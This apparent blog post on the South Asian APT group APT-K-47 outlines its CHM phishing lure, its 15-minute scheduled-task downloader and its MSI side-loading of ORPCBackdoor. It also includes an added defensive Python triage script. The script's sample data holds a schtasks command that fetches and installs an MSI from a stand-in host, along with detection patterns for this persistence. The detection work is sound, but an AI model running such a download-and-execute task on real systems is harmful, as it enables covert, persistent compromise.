APT-K-47 "Mysterious Elephant": A New APT Organization in South Asia

By TFH

Published on Aug 19, 2023

In the dynamic battlefield of cyberspace, the emergence of new Advanced Persistent Threats (APTs) is a relentless challenge. APT-K-47, dubbed "Mysterious Elephant," has recently surfaced in South Asia, particularly targeting Pakistan. This blog post unravels the intricate details of this new APT organization, offering insights into its tactics, techniques, and procedures (TTPs).

The Anatomy of the Attack Chain

The attack chain of APT-K-47, known as "Mysterious Elephant," is a masterclass in precision and stealth. This section dissects the various stages of the attack, from the initial bait to the final strike, providing a comprehensive view of how this new APT organization in South Asia orchestrates its cyber onslaught.

Phishing Email: The Bait

The attack commences with a phishing email containing a CHM file, masquerading as content from the "Russia-China Committee for Friendship, Peace, and Development."

Malicious CHM File: The Hook

The CHM file's malicious component, doc.html, creates a scheduled task that runs every 15 minutes, downloading and executing a second-order (second-stage) malicious program.

Second-Order Attack: The Strike

The second-order MSI file carries two files: a malicious "black" file (ORPCBackdoor) and a legitimate "white" file (Microsoft's official service file). The legitimate file launches the malicious one.
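For defenders, the chain above leaves three observable signals in process-creation telemetry: a child process of the CHM viewer (hh.exe), a scheduled task created with a 15-minute repeat, and a task action that runs an MSI. The following triage sketch is an added example, not code from the original post; the event field names, host names, task names and command lines are constructed, and the assumption that the task action references msiexec or a .msi file is an inference from the MSI second stage, not something the post states.

```python
import re
from ntpath import basename  # Windows path handling that works on any OS

# Constructed process-creation events (Sysmon Event ID 1 style); not real telemetry.
SAMPLE_EVENTS = [
    {"host": "ws-01", "parent": r"C:\Windows\hh.exe", "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'schtasks /create /tn "ExampleUpdater" /sc minute /mo 15 /tr "msiexec /i http://placeholder.invalid/a.msi" /f'},
    {"host": "ws-02", "parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\hh.exe",
     "cmdline": r"hh.exe C:\Docs\manual.chm"},
    {"host": "srv-03", "parent": r"C:\Windows\System32\cmd.exe", "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'schtasks /create /tn "NightlyBackup" /sc daily /st 02:00 /tr C:\Tools\backup.cmd'},
    {"host": "ws-04", "parent": r"C:\Windows\System32\cmd.exe", "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'schtasks /Create /SC MINUTE /MO 15 /TN "Sync" /TR C:\Tools\sync.exe'},
]

def flag_value(cmdline, flag):
    """Return the value following a schtasks flag such as /sc or /mo (case-insensitive)."""
    m = re.search(r"(?i)(?:^|\s)" + re.escape(flag) + r'\s+("[^"]*"|\S+)', cmdline)
    return m.group(1).strip('"') if m else None

def score_event(ev):
    """Return the list of indicators that one process-creation event matches."""
    hits = []
    image = basename(ev["image"]).lower()
    parent = basename(ev["parent"]).lower()
    cmd = ev["cmdline"]
    # Signal 1: the HTML Help viewer rarely has a legitimate reason to spawn other programs.
    if parent == "hh.exe" and image != "hh.exe":
        hits.append("child_of_chm_viewer")
    if image == "schtasks.exe" and re.search(r"(?i)\s/create\b", cmd):
        # Signal 2: the 15-minute repeat interval described in the post.
        sc, mo = flag_value(cmd, "/sc"), flag_value(cmd, "/mo")
        if sc and sc.lower() == "minute" and mo == "15":
            hits.append("task_every_15_min")
        # Signal 3 (assumption): the task action installs or fetches an MSI.
        if re.search(r"(?i)msiexec|\.msi\b", flag_value(cmd, "/tr") or ""):
            hits.append("task_runs_msi")
    return hits

def triage(events):
    """Map host -> indicators, keeping only events that match at least two signals."""
    flagged = {}
    for ev in events:
        hits = score_event(ev)
        if len(hits) >= 2:
            flagged[ev["host"]] = hits
    return flagged

if __name__ == "__main__":
    for host, hits in triage(SAMPLE_EVENTS).items():
        print(host, hits)
```

Requiring two signals keeps an ordinary 15-minute maintenance task (ws-04 in the sample) out of the alert queue while still surfacing the combined pattern.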

Multi-Country Targeting: The Scope

Contrary to initial reports, the attack targets multiple countries, not just Pakistan, as evidenced by the phishing file's content and Knownsec's remote sensing mapping big data.
